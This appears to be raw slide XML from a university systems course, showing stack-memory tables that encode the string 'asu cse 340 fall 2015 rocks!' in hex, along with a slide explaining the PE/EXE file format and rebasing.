                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a: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177</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0xfd2ac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd290</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x804840c</a:t>
                      </a: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277190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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280422" y="-24436"/>
            <a:ext cx="5467428" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048504: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2937783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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>fall (0x6c6c6166)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)</a:t>
                      </a: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7"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20657363)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>asu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20757361)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>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0"/>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1"/>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2"/>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3"/>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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10015"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a: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178</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0xfd2ac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd290</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x804840c</a:t>
                      </a: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277190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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280422" y="-24436"/>
            <a:ext cx="5467428" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048504: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197956810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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> 201 (0x31303220)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>fall (0x6c6c6166)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)</a:t>
                      </a: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7"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20657363)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>asu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20757361)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>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0"/>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1"/>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2"/>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3"/>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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10015"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a: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179</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0xfd2ac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd290</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x804840c</a:t>
                      </a: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277190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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280422" y="-24436"/>
            <a:ext cx="5467428" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048504: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1784447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82" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The PE File Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="993283" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The PE file was introduced to allow MS-DOS programs to be larger than 64K (limit of .COM format) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also known as the “EXE” format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Programs are written as if they were always loaded at address 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The program is actually loaded in different points in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The header contains a number of relocation entries that are used at loading time to “fix” the addresses (this procedure is called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>rebasing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79249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32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32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32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32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932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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
